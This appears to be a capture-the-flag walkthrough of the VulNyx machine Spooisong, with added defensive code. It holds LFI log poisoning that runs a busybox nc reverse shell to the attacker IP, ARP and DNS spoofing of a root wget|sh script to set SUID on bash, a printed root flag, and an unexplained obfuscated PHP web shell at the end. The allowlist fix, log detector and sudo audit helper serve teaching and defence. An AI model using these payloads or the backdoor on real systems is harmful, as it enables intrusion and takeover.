Spooisong

Posted by axlfpe on 2025-05-26

Target IP: 192.168.108.135

Attacker IP: 192.168.108.50

Target machine: https://vulnyx.com/

```bash
Kal ddddx ~ ❯ export ip=192.168.108.135                         ✘ 255 took 12m 7s at 08:54:34
Kal ddddx ~ ❯ rustscan -a $ip
```


Only port 80 is open. Visiting it shows a default page, so let's brute-force the directories.

```bash
Kal ddddx ~ ❯ feroxbuster -u http://192.168.108.135 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
```


An index.php turns up under kavin.

Let's visit the kavin page.


The page navigation reveals a very typical parameter-include page structure, which very likely has a Local File Inclusion (LFI) vulnerability.

```
http://192.168.108.135/kavin/
http://192.168.108.135/kavin/inc.php?i=about
http://192.168.108.135/kavin/inc.php?i=services
http://192.168.108.135/kavin/inc.php?i=portfolio
http://192.168.108.135/kavin/inc.php?i=pricing
```

The parameter i=about clearly controls which page content gets included; behind it the code is probably doing something like:

```php
include($_GET['i'] . '.php');
```
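To make the root cause concrete, here is an added Python model (my own example, not code from the box or from this writeup) of the two ways such an include can be written. `unsafe_resolve` mirrors `include($_GET['i'] . suffix)`: the parameter is concatenated into a path and the OS then honours `..` segments and absolute paths, so the result can leave the web root. `safe_resolve` shows the fix a developer should ship: the parameter is a key into an allowlist of page names and never touches path resolution. The web root, the fixed `.conf` suffix and the allowlist are assumptions; the writeup only infers the suffix and reads both `.conf` and `.log` files through the same parameter, so the real include logic is not recoverable from it.

```python
import posixpath

# Assumptions (not from the writeup): the kavin app lives under this web root and
# appends one fixed suffix; the writeup only infers that ".conf" is appended.
WEB_ROOT = "/var/www/html/kavin"
SUFFIX = ".conf"
# The page names visible in the site's own navigation links.
ALLOWED_PAGES = frozenset({"about", "services", "portfolio", "pricing"})


def unsafe_resolve(i: str, root: str = WEB_ROOT, suffix: str = SUFFIX) -> str:
    """Model of include($_GET['i'] . suffix): plain string concatenation, after
    which the OS resolves '..' segments and absolute paths, so the result may
    land anywhere on the filesystem."""
    # posixpath.join discards root when the second argument is absolute,
    # just as include() would open an absolute path directly.
    return posixpath.normpath(posixpath.join(root, i + suffix))


def escapes_root(path: str, root: str = WEB_ROOT) -> bool:
    """True when a resolved path lies outside the intended directory."""
    return path != root and not path.startswith(root.rstrip("/") + "/")


def safe_resolve(i: str, root: str = WEB_ROOT, suffix: str = SUFFIX,
                 allowed: frozenset = ALLOWED_PAGES):
    """Hardened variant: the parameter is a key into an allowlist, never a path.
    Anything not on the list is refused before any filesystem access happens."""
    if i not in allowed:
        return None
    return posixpath.join(root, i + suffix)


if __name__ == "__main__":
    for param in ("about",
                  "../../../../../../etc/apache2/sites-enabled/000-default",
                  "/var/www/kavin-logs/access"):
        resolved = unsafe_resolve(param)
        print(f"{param!r:<62} unsafe -> {resolved} "
              f"(escapes root: {escapes_root(resolved)}) | safe -> {safe_resolve(param)}")
```

The point of `escapes_root` is that a denylist of characters is the wrong tool: once user input reaches the path at all, you have to reason about what the OS does with it. With the allowlist there is nothing to reason about.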

Let's try fuzzing for LFI with ffuf.

```bash
Kal ddddx ~ ❯ ffuf -u 'http://192.168.108.135/kavin/inc.php?i=FUZZ'  -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -fs 0

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://192.168.108.135/kavin/inc.php?i=FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 0
________________________________________________

/etc/security/group [Status: 200, Size: 3635, Words: 690, Lines: 107, Duration: 1ms]
/etc/security/limits [Status: 200, Size: 2752, Words: 835, Lines: 68, Duration: 2ms]
:: Progress: [929/929] :: Job [1/1] :: 73 req/sec :: Duration: [0:00:02] :: Errors: 0 ::
```

We have confirmed an LFI exists, but strangely the other payloads return empty responses, so there may be a filter or some other defence in place. Normally Linux configuration files end in .conf (e.g. limits.conf), yet here files named limits and group can be read directly. Putting this together, we guess that the include appends .conf automatically, or that the file has no suffix.

Let's grab the Apache virtual host configuration file, 000-default.

```bash
Kal ddddx ~ ❯ curl "http://192.168.108.135/kavin/inc.php?i=../../../../../../etc/apache2/sites-enabled/000-default"
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com

ServerAdmin webmaster@localhost
DocumentRoot /var/www/html

# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn

ErrorLog /var/www/kavin-logs/error.log
CustomLog /var/www/kavin-logs/access.log combined

# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
</VirtualHost>
```

The web root is /var/www/html, and the Apache access log lives at /var/www/kavin-logs/access.log.

We can try forging the User-Agent to poison the log and bounce a shell back to the attack box.

```bash
Kal ddddx ~ ❯ curl "http://192.168.108.135/kavin/inc.php?i=/var/www/kavin-logs/access"

192.168.108.128 - - [26/May/2025:17:19:05 +0200] "GET /kavin/inc.php?i=/var/www/kavin-logs/access HTTP/1.1" 200 149 "-" "curl/8.13.0-rc2"
Kal ddddx ~ ❯ curl -A "<?php system('id'); ?>" http://192.168.108.135/
<html>
<body>
<h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
</body>
</html>
Kal ddddx ~ ❯ curl "http://192.168.108.135/kavin/inc.php?i=/var/www/kavin-logs/access"

192.168.108.128 - - [26/May/2025:17:19:05 +0200] "GET /kavin/inc.php?i=/var/www/kavin-logs/access HTTP/1.1" 200 149 "-" "curl/8.13.0-rc2"
192.168.108.128 - - [26/May/2025:17:19:23 +0200] "GET /kavin/inc.php?i=/var/www/kavin-logs/access HTTP/1.1" 200 312 "-" "curl/8.13.0-rc2"
192.168.108.128 - - [26/May/2025:17:21:52 +0200] "GET / HTTP/1.1" 200 438 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)"
Kal ddddx ~ ❯ curl -A "<?php system('busybox nc 192.168.108.50 5555 -e /bin/bash'); ?>" http://192.168.108.135/
<html>
<body>
<h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
</body>
</html>
Kal ddddx ~ ❯ curl "http://192.168.108.135/kavin/inc.php?i=/var/www/kavin-logs/access"
```
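Everything that just happened is visible in the very log that was abused, which makes this chain easy to catch from the blue-team side. Below is an added Python detector (my own example, not part of this writeup) that parses Apache combined-format lines, flags a PHP open tag in the User-Agent or Referer (the poisoning step), flags traversal sequences or absolute system/log paths in the request (the inclusion step), and then reports hosts that did both. The sample log lines are constructed and modelled on the entries shown above; note that the raw file on disk still contains the `<?php` tag, even though the writeup's view of the log through the include shows the already-executed output instead.

```python
import re

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Indicators. A PHP open tag has no business in a Referer or User-Agent header;
# traversal sequences and absolute system/log paths have no business in an include parameter.
PHP_TAG = re.compile(r"<\?(?:php\b|=)?", re.IGNORECASE)
TRAVERSAL = re.compile(r"(?:\.\./|%2e%2e(?:/|%2f)|\.\.%2f)", re.IGNORECASE)
SYSTEM_PATH = re.compile(r"=/(?:etc|proc|var/log|var/www/[^/\s&]*logs)/", re.IGNORECASE)

# Constructed sample log, modelled on the entries shown in the writeup.
SAMPLE_LOG = [
    '192.168.108.128 - - [26/May/2025:17:10:00 +0200] "GET /kavin/inc.php?i=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.168.108.128 - - [26/May/2025:17:15:41 +0200] "GET /kavin/inc.php?i=../../../../../../etc/apache2/sites-enabled/000-default HTTP/1.1" 200 1200 "-" "curl/8.13.0-rc2"',
    '192.168.108.128 - - [26/May/2025:17:19:05 +0200] "GET /kavin/inc.php?i=/var/www/kavin-logs/access HTTP/1.1" 200 149 "-" "curl/8.13.0-rc2"',
    '192.168.108.128 - - [26/May/2025:17:21:52 +0200] "GET / HTTP/1.1" 200 438 "-" "<?php system(\'id\'); ?>"',
    '10.0.0.7 - - [26/May/2025:17:30:00 +0200] "GET /kavin/inc.php?i=services HTTP/1.1" 200 980 "-" "Mozilla/5.0"',
]


def parse_combined(line: str):
    """Split one combined-format line into named fields, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: dict) -> list:
    """Return the list of indicator names that fire on one parsed entry."""
    findings = []
    if PHP_TAG.search(entry["agent"]) or PHP_TAG.search(entry["referer"]):
        findings.append("log-poisoning: PHP tag in a client-controlled header")
    if TRAVERSAL.search(entry["request"]):
        findings.append("lfi: directory traversal in request")
    if SYSTEM_PATH.search(entry["request"]):
        findings.append("lfi: absolute system or log path in request")
    return findings


def scan(lines):
    """Return (line_no, host, findings) for every suspicious entry."""
    alerts = []
    for n, line in enumerate(lines, 1):
        entry = parse_combined(line)
        if entry is None:
            continue  # unparseable lines deserve their own alert in production; skipped here
        findings = classify(entry)
        if findings:
            alerts.append((n, entry["host"], findings))
    return alerts


def chained_hosts(alerts):
    """Hosts that both planted a PHP tag and included a system/log path: the two
    halves of the log-poisoning chain walked through above."""
    poisoned, included = set(), set()
    for _, host, findings in alerts:
        for f in findings:
            (poisoned if f.startswith("log-poisoning") else included).add(host)
    return poisoned & included


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for n, host, findings in hits:
        print(f"line {n} from {host}: {'; '.join(findings)}")
    print("hosts completing the poison-then-include chain:", chained_hosts(hits))
```

The correlation in `chained_hosts` is what turns two noisy single-line rules into a high-confidence alert: a scanner throwing `../` at a parameter is everyday background noise, but the same client writing PHP into a header and then asking the application to include its own log file is exactly this attack and little else.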

Once inside, I gathered information. After some searching there were no obvious clues, and uploading linpeas.sh and pspy64 to scan turned up nothing either. According to a walkthrough, the password for the suraxddq account is simply the username.

```bash
(remote) www-data@spooisong:/var/www/html/kavin$ curl 192.168.108.50:8000/linpeas.sh -o /tmp/linpeas.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 820k 100 820k 0 0 65.6M 0 --:--:-- --:--:-- --:--:-- 66.7M
(remote) www-data@spooisong:/var/www/html/kavin$
(remote) www-data@spooisong:/var/www/html/kavin$ curl 192.168.108.50:8000/pspy64 -o /tmp/pspy64
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 3032k 100 3032k 0 0 186M 0 --:--:-- --:--:-- --:--:-- 197M
(remote) www-data@spooisong:/var/www/html/kavin$
(remote) www-data@spooisong:/var/www/html/kavin$ cd /tmp/
(remote) www-data@spooisong:/tmp$ ls
linpeas.sh pspy64
(remote) www-data@spooisong:/tmp$ chmod +x linpeas.sh
(remote) www-data@spooisong:/tmp$ chmod +x pspy64
```

```bash
(remote) www-data@spooisong:/tmp$ cat /etc/passwd
....
suraxddq:x:1000:1000:suraxddq:/home/suraxddq:/bin/bash
(remote) www-data@spooisong:/tmp$ su suraxddq
Password:
suraxddq@spooisong:/tmp$
```

After switching user, run sudo -l: it shows that suraxddq can run **/var/backups/dns as root, without a password,** on the target host spooisong. Let's look at the script content.

```bash
suraxddq@spooisong:/tmp$ sudo -l
Matching Defaults entries for suraxddq on spooisong:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty

User suraxddq may run the following commands on spooisong:
(root) NOPASSWD: /var/backups/dns
```

```bash
suraxddq@spooisong:/tmp$ file /var/backups/dns
ls -l /var/backups/dns
bash: file: orden no encontrada
-rwx---r-- 1 root root 78 sep 2 2024 /var/backups/dns
suraxddq@spooisong:/tmp$ cat /var/backups/dns
#!/bin/bash

/usr/bin/wget -O- "http://sp00is0ng.nyx/configure" | /usr/bin/sh
```
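The script itself is the whole problem: a root-privileged sudo rule whose effect is decided at run time by a DNS name and an unauthenticated plaintext download, with the result piped straight into a shell. That pattern is worth hunting for on any host you administer, so here is an added Python audit helper (my own example, not from the box or this writeup) that parses `sudo -l` output for NOPASSWD rules and checks each target script for "downloader | shell" pipelines. The `sudo -l` text and the script body are constructed inline to mirror what is shown above; on a real host you would read the script from disk, and the comma split on a rule's command list is a simplification.

```python
import re
import shlex

# Constructed inputs modelled on the writeup: the sudo -l output and the
# content of the script it names. On a real host, read the script from disk.
SUDO_L_OUTPUT = """\
Matching Defaults entries for suraxddq on spooisong:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin,
    use_pty

User suraxddq may run the following commands on spooisong:
    (root) NOPASSWD: /var/backups/dns
"""

SCRIPTS = {
    "/var/backups/dns": '#!/bin/bash\n\n/usr/bin/wget -O- "http://sp00is0ng.nyx/configure" | /usr/bin/sh\n',
}

NOPASSWD_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+NOPASSWD:\s+(?P<cmds>.+)$")
DOWNLOADER_RE = re.compile(r"\b(?:wget|curl)\b")
PLAIN_HTTP_RE = re.compile(r"\bhttp://", re.IGNORECASE)
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:/usr/bin/|/bin/)?(?:sh|bash|dash|zsh)\b")


def nopasswd_commands(sudo_l_text):
    """Return (run-as user, command) pairs for every NOPASSWD rule in sudo -l output.
    Simplification: commands are split on commas, which breaks on commas inside arguments."""
    out = []
    for line in sudo_l_text.splitlines():
        m = NOPASSWD_RE.match(line)
        if m:
            for cmd in m.group("cmds").split(","):
                out.append((m.group("runas").strip(), cmd.strip()))
    return out


def audit_script(text):
    """Flag script lines that hand downloaded content to a shell. Both the downloader
    and the shell must appear on the same line, which covers the common one-liner form."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # blank lines, comments and the shebang carry no commands
        if DOWNLOADER_RE.search(line) and PIPE_TO_SHELL_RE.search(line):
            transport = "plaintext HTTP" if PLAIN_HTTP_RE.search(line) else "the network"
            findings.append((lineno, f"pipes content fetched over {transport} into a shell"))
    return findings


def audit(sudo_l_text, scripts):
    """Cross-reference every NOPASSWD target with its script body (scripts: path -> text)."""
    report = []
    for runas, cmd in nopasswd_commands(sudo_l_text):
        path = shlex.split(cmd)[0]
        body = scripts.get(path)
        if body is None:
            continue  # compiled binary or script not supplied; nothing to inspect here
        for lineno, reason in audit_script(body):
            report.append({"runas": runas, "command": path, "line": lineno, "reason": reason})
    return report


if __name__ == "__main__":
    for item in audit(SUDO_L_OUTPUT, SCRIPTS):
        print(f"{item['command']} (runs as {item['runas']}), line {item['line']}: {item['reason']}")
```

A hit from this audit means the host's root privileges depend on whoever answers DNS and HTTP on the local network at the moment the script runs. The fixes are the obvious ones: fetch over HTTPS with certificate validation, verify a pinned hash or signature before executing anything, and do not give an unprivileged user a NOPASSWD rule for a script that downloads code at all.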

We have no write permission on the script, so we use DNS spoofing + ARP spoofing + an HTTP proxy to point the target's request for sp00is0ng.nyx at our Kali box and forge the response.

First set up DNS spoofing so that every DNS query for the sp00is0ng.nyx domain is hijacked and resolved to our Kali machine's IP, 192.168.108.50.

```bash
Kal ddddx ~ ❯ sudo bettercap                                               at 18:44:13
[sudo] password for ddddx:
bettercap v2.33.0 (built for linux amd64 with go1.22.6) [type 'help' for a list of commands]

192.168.108.0/24 > 192.168.108.50 » [18:44:24] [sys.log] [inf] gateway monitor started ...
192.168.108.0/24 > 192.168.108.50 » set dns.spoof.domains sp00is0ng.nyx
192.168.108.0/24 > 192.168.108.50 » set dns.spoof.address 192.168.108.50
192.168.108.0/24 > 192.168.108.50 » set arp.spoof.targets 192.168.108.135
192.168.108.0/24 > 192.168.108.50 » dns.spoof on
[18:49:47] [sys.log] [inf] dns.spoof sp00is0ng.nyx -> 192.168.108.50
192.168.108.0/24 > 192.168.108.50 » [18:49:47] [sys.log] [inf] dns.spoof starting net.recon as a requirement for dns.spoof
192.168.108.0/24 > 192.168.108.50 » [18:49:47] [endpoint.new] endpoint 192.168.108.135 detected as 00:0c:29:af:07:e3 (VMware, Inc.).
192.168.108.0/24 > 192.168.108.50 » [18:49:47] [endpoint.new] endpoint 192.168.108.254 detected as 00:50:56:e4:4f:00 (VMware, Inc.).
192.168.108.0/24 > 192.168.108.50 » arp.spoof on
192.168.108.0/24 > 192.168.108.50 » [18:49:51] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.
192.168.108.0/24 > 192.168.108.50 »
```

Start an HTTP server that answers the request for http://sp00is0ng.nyx/configure with the prepared malicious script.

```bash
Kal ddddx ~ ❯ echo 'chmod +s /bin/bash' > configure took 26s at 19:03:52

Kal ddddx ~ ❯ python -m http.server 80 at 19:04:00
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.108.135 - - [26/May/2025 19:04:05] "GET /configure HTTP/1.1" 200 -
```

Finally, run the script, and the privilege escalation is done.

```bash
suraxddq@spooisong:/var/www/html/kavin$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1265648 mar 29 2024 /bin/bash
suraxddq@spooisong:/var/www/html/kavin$ sudo /var/backups/dns
--2025-05-26 19:58:56-- http://sp00is0ng.nyx/configure
Resolviendo sp00is0ng.nyx (sp00is0ng.nyx)... 192.168.108.50, ::ffff:192.168.108.50
Conectando con sp00is0ng.nyx (sp00is0ng.nyx)[192.168.108.50]:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 19 [application/octet-stream]
Grabando a: «STDOUT»

- 100%[================>] 19 --.-KB/s en 0s

2025-05-26 19:58:56 (595 KB/s) - escritos a stdout [19/19]

suraxddq@spooisong:/var/www/html/kavin$ curl http://sp00is0ng.nyx/configure
chmod +s /bin/bash
suraxddq@spooisong:/var/www/html/kavin$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1265648 mar 29 2024 /bin/bash
suraxddq@spooisong:/var/www/html/kavin$ /bin/bash -p
suraxddq@spooisong:/var/www/html/kavin# id
uid=1000(suraxddq) gid=1000(suraxddq) euid=0(root) egid=0(root) grupos=0(root),1000(suraxddq)
suraxddq@spooisong:/var/www/html/kavin# whoami
root
suraxddq@spooisong:~# cd /root/
suraxddq@spooisong:/root# ls
root.txt
suraxddq@spooisong:/root# cat root.txt
3d7c0671c87e41cb601d60417992d817
```
```php
<?php
if (isset($_POST['cmd']) && isset($_POST['access'])) {
    $reversed_access = strrev($_POST['access']); // reverse the access parameter
    $reversed_access($_POST['cmd']); // call the reversed access value as a function name, with cmd as its argument
}
?>
```
